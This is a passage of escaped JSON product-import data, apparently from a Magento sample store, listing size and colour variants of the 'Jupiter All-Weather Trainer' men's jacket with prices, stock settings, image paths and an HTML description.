":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj06-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj06-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Purple\"},\"339\":{\"sku\":\"MJ06-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Jupiter All-Weather Trainer -S-Blue\",\"description\":\"<p>Inclement climate be damned. With your breathable, water-resistant Jupiter All-Weather Trainer, you can focus on fuel and form and leave protection and comfort to us. The fabric is a special light fleece that wicks moisture and insulates at once.<\\/p>\\n<p>&bull; Relaxed fit. <br \\/>&bull; Hand pockets. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Reflective safety trim.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"56.99\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"jupiter-all-weather-trainer-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj06-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj06-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj06-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj06-blue_alt1.jpg,\\/m\\/j\\/mj06-blue_back.jpg\",\"image\":\"\\/m\\/j\\/mj06-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj06-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj06-blue_alt1.jpg,\\/m\\/j\\/mj06-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"340\":{\"sku\":\"MJ06-S-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Jupiter All-Weather Trainer -S-Green\",\"description\":\"<p>Inclement climate be damned. With your breathable, water-resistant Jupiter All-Weather Trainer, you can focus on fuel and form and leave protection and comfort to us. The fabric is a special light fleece that wicks moisture and insulates at once.<\\/p>\\n<p>&bull; Relaxed fit. <br \\/>&bull; Hand pockets. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Reflective safety trim.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"56.99\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"jupiter-all-weather-trainer-s-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj06-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj06-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj06-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj06-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj06-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Green\"},\"341\":{\"sku\":\"MJ06-S-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Jupiter All-Weather Trainer -S-Purple\",\"description\":\"<p>Inclement climate be damned. With your breathable, water-resistant Jupiter All-Weather Trainer, you can focus on fuel and form and leave protection and comfort to us. The fabric is a special light fleece that wicks moisture and insulates at once.<\\/p>\\n<p>&bull; Relaxed fit. <br \\/>&bull; Hand pockets. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Reflective safety trim.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"56.99\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"jupiter-all-weather-trainer-s-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj06-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj06-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj06-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj06-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj06-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Purple\"},\"342\":{\"sku\":\"MJ06-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Jupiter All-Weather Trainer -M-Blue\",\"description\":\"<p>Inclement climate be damned. With your breathable, water-resistant Jupiter All-Weather Trainer, you can focus on fuel and form and leave protection and comfort to us. The fabric is a special light fleece that wicks moisture and insulates at once.<\\/p>\\n<p>&bull; Relaxed fit. <br \\/>&bull; Hand pockets. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Reflective safety trim.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"56.99\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"jupiter-all-weather-trainer-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj06-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj06-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj06-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj06-blue_alt1.jpg,\\/m\\/j\\/mj06-blue_back.jpg\",\"image\":\"\\/m\\/j\\/mj06-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj06-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj06-blue_alt1.jpg,\\/m\\/j\\/mj06-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"343\":{\"sku\":\"MJ06-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Jupiter All-Weather Trainer -M-Green\",\"description\":\"<p>Inclement climate be damned. With your breathable, water-resistant Jupiter All-Weather Trainer, you can focus on fuel and form and leave protection and comfort to us. The fabric is a special light fleece that wicks moisture and insulates at once.<\\/p>\\n<p>&bull; Relaxed fit. <br \\/>&bull; Hand pockets. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Reflective safety trim.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"56.99\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"jupiter-all-weather-trainer-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj06-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj06-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj06-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj06-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj06-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},\"344\":{\"sku\":\"MJ06-M-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Jupiter All-Weather Trainer -M-Purple\",\"description\":\"<p>Inclement climate be damned. With your breathable, water-resistant Jupiter All-Weather Trainer, you can focus on fuel and form and leave protection and comfort to us. The fabric is a special light fleece that wicks moisture and insulates at once.<\\/p>\\n<p>&bull; Relaxed fit. <br \\/>&bull; Hand pockets. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Reflective safety trim.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"56.99\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"jupiter-all-weather-trainer-m-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj06-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj06-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj06-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj06-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj06-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Purple\"},\"345\":{\"sku\":\"MJ06-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Jupiter All-Weather Trainer -L-Blue\",\"description\":\"<p>Inclement climate be damned. With your breathable, water-resistant Jupiter All-Weather Trainer, you can focus on fuel and form and leave protection and comfort to us. The fabric is a special light fleece that wicks moisture and insulates at once.<\\/p>\\n<p>&bull; Relaxed fit. <br \\/>&bull; Hand pockets. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Reflective safety trim.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"56.99\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"jupiter-all-weather-trainer-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj06-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj06-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj06-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj06-blue_alt1.jpg,\\/m\\/j\\/mj06-blue_back.jpg\",\"image\":\"\\/m\\/j\\/mj06-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj06-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj06-blue_alt1.jpg,\\/m\\/j\\/mj06-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"346\":{\"sku\":\"MJ06-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Jupiter All-Weather Trainer -L-Green\",\"description\":\"<p>Inclement climate be damned. With your breathable, water-resistant Jupiter All-Weather Trainer, you can focus on fuel and form and leave protection and comfort to us. The fabric is a special light fleece that wicks moisture and insulates at once.<\\/p>\\n<p>&bull; Relaxed fit. <br \\/>&bull; Hand pockets. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Reflective safety trim.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"56.99\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"jupiter-all-weather-trainer-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj06-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj06-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj06-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj06-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj06-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},\"347\":{\"sku\":\"MJ06-L-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Jupiter All-Weather Trainer -L-Purple\",\"description\":\"<p>Inclement climate be damned. With your breathable, water-resistant Jupiter All-Weather Trainer, you can focus on fuel and form and leave protection and comfort to us. The fabric is a special light fleece that wicks moisture and insulates at once.<\\/p>\\n<p>&bull; Relaxed fit. <br \\/>&bull; Hand pockets. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Reflective safety trim.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 